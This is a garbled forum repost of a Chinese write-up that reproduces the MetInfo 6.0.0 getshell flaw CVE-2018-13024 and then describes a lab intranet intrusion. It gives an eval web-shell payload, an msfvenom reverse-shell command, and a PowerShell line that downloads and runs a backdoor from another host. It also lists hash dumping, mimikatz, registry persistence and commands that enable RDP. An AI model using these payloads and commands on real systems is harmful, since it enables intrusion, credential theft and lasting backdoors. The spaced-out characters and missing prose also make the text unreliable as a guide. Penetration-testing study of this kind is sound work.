[13646] 2019-01-13_CVE-2018-13024复现及一次简单的内网渗透

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2019-01-13_CVE-2018-13024复现及一次简单的内网渗透 C V E - 2 0 1 8 - 1 3 0 2 4   t w o s m i 1 e   F r e e B u f   2 0 1 9 - 0 1 - 1 3 0 x 0 0   k a l i   l i n u x W i n d o w s 1 0 ( ) W i n d o w s   2 0 0 3   I P 1 9 2 . 1 6 8 . 6 1 . 1 4 0   I P 1 9 2 . 1 6 8 . 1 2 9 . 1 3 9 W i n d o w s   2 0 0 8   I P 1 9 2 . 1 6 8 . 1 2 9 . 1 3 0 0 x 0 1   M e t I n f o 使 P H P M y s q l C M S M e t i n f o   6 . 0 . 0 a d m i n / c o l u m n / s a v e . p h p m o d u l e . p h p M e t I n f o   5 . 3 . 1 6 M e t I n f o   6 . 0 . 0 m e t i n f o 6 . 0 . 0 a d m i n c o l u m n s a v e . p h p c o l u m n _ c o p y c o n f i g
c o l u m n _ c o p y c o n f i g C o p y i n d x ( )
c o l u m n _ c o p y c o n f i g m e t i n f o g e t $ m o d u l e 0 x 0 2   访 w h o a m i H T T P / * * / f u n c t i o n   C o p y i n d x ( $ n e w i n d x , $ t y p e ) {         i f ( ! f i l e _ e x i s t s ( $ n e w i n d x ) ) {                 $ o l d c o n t   = " < ? p h p n #   M e t I n f o   E n t e r p r i s e   C o n t e n t   M a n a g e m e n t   S y s t e m   n #   C o p y r i g h t   ( C )   M e t I n f o   C o . , L t d   ( h t t p : / / w w w . m e t i n f o . c n ) .   A l l   r i g h t s   r e s e r v e d .   n $ f i l p y   =   b a s e n a m e ( d i r n a m e ( _ _ F I L E _ _ ) ) ; n $ f m o d u l e = $ t y p e ; n r e q u i r e _ o n c e   ' . . / i n c l u d e / m o d u l e . p h p ' ;   n r e q u i r e _ o n c e   $ m o d u l e ;   n #   T h i s   p r o g r a m   i s   a n   o p e n   s o u r c e   s y s t e m ,   c o m m e r c i a l   u s e ,   p l e a s e   c o n s c i o u s l y   t o   p u r c h a s e   c o m m e r c i a l   l i c e n s e . n #   C o p y r i g h t   ( C )   M e t I n f o   C o . ,   L t d .   ( h t t p : / / w w w . m e t i n f o . c n ) .   A l l   r i g h t s   r e s e r v e d . n ? > " ;                 $ f p   =   f o p e n ( $ n e w i n d x , w ) ;                 f p u t s ( $ f p ,   $ o l d c o n t ) ;                 f c l o s e ( $ f p ) ;         } } $ t y p e $ t y p e $ m o d u l e m e t i n f o 6 . 0 . 0 a d m i n i n c l u d e c o m m o n . i n c . p h p f o r e a c h ( a r r a y ( ' _ C O O K I E ' ,   ' _ P O S T ' ,   ' _ G E T ' )   a s   $ _ r e q u e s t )   {         f o r e a c h ( $ $ _ r e q u e s t   a s   $ _ k e y   = >   $ _ v a l u e )   {                 $ _ k e y { 0 }   ! =   ' _ '   & &   $ $ _ k e y   =   d a d d s l a s h e s ( $ _ v a l u e , 0 , 0 , 1 ) ;                 $ _ M [ ' f o r m ' ] [ $ _ k e y ] = d a d d s l a s h e s ( $ _ v a l u e , 0 , 0 , 1 ) ;         } }
m e t i n f o 5 . 3 . 1 9   w e b s h e l l M e t i n f o 6 . 0 . 0 g e t s h e l l 使 p a y l o a d   g e t s h e l l / a d m i n a d m i n a d m i n g e t s h e l l S h e l l u p l o a d i n d e x . p h p 使 P a y l o a d : a d m i n / c o l u m n / s a v e . p h p ? n a m e = 1 2 3 & a c t i o n = e d i t o r & f o l d e r n a m e = u p l o a d & m o d u l e = 2 2 ; @ e v a l ( $ _ P O S T [ ' a ' ] ) ; / *
a d m i n i s t r a t o r 使 使 m s f m s f m s f v e n o m   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = 1 9 2 . 1 6 8 . 6 1 . 3   - f   e x e > t w o s m i l e . e x e
k a l i s h e l l 使
  使 g e t u i d , s y s t e m i n f o , i p c o n f i g a l l , n e t   u s e r , n e t   v i e w I P 使 m s f g e t s y s t e m m s f m i g r a t e
使 m s f h a s h d u m p h a s h M e t e r p r e t e r s h e l l s h e l l 使 P e r s i s t e n c e r u n   p o s t / w i n d o w s / g a t h e r / c h e c k v m     # r u n   p o s t / l i n u x / g a t h e r / c h e c k v m     # r u n   p o s t / w i n d o w s / g a t h e r / f o r e n s i c s / e n u m _ d r i v e s     # r u n   p o s t / w i n d o w s / g a t h e r / e n u m _ a p p l i c a t i o n s     # r u n   p o s t / w i n d o w s / g a t h e r / d u m p l i n k s     # r u n   p o s t / w i n d o w s / g a t h e r / e n u m _ i e     # I E r u n   p o s t / w i n d o w s / g a t h e r / e n u m _ c h r o m e     # C h r o m e r u n   p o s t / w i n d o w s / g a t h e r / e n u m _ p a t c h e s     # r u n   p o s t / w i n d o w s / g a t h e r / e n u m _ d o m a i n     # l o a d   m i m i k a t z k e r b e r o s
- U H K C U S o f t w a r e M i c r o s o f t W i n d o w s C u r r e n t V e r s i o n R u n - i - p - r i p s h e l l M e t s v c   3 1 3 3 7 h a n d l e r w i n d o w s / m e t s v c _ b i n d _ t c p s h e l l p o w e r s h e l l p o w e r s h e l l h t t p s : / / g i t h u b . c o m / r e 4 l i t y / S c h t a s k s - B a c k d o o r   使 R e a d m e 1 9 2 . 1 6 8 . 6 1 . 1 4 0   1 9 2 . 1 6 8 . 6 1 . 3   n c 3 3 8 9 r u n   p e r s i s t e n c e   - U   - i   1 0   - p   4 4 4 4   - r   1 9 2 . 1 6 8 . 6 1 . 3 p o w e r s h e l l . e x e - e x e c   b y p a s s   - c   " I E X   ( N e w - O b j e c t N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( ' h t t p : / / 1 9 2 . 1 6 8 . 6 1 . 1 4 0 / I n v o k e - t a s k B a c k d o o r . p s 1 ' ) ; I n v o k e - T a s k s b a c k d o o r - m e t h o d   n c c a t   - i p   1 9 2 . 1 6 8 . 6 1 . 3   - p o r t   5 3   - t i m e   2 "
R E G   A D D   " H K L M S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l   S e r v e r "   / v   f D e n y T S C o n n e c t i o n s   / t   R E G _ D W O R D   / d   0 0 0 0 0 0 0 0   / f R E G   A D D   " H K E Y _ L O C A L _ M A C H I N E S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l   S e r v e r W i n S t a t i o n s R D P - T c p "   / v   P o r t N u m b e r   / t   R E G _ D W O R D   / d   0 x 0 0 0 0 0 d 3 d   / f
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则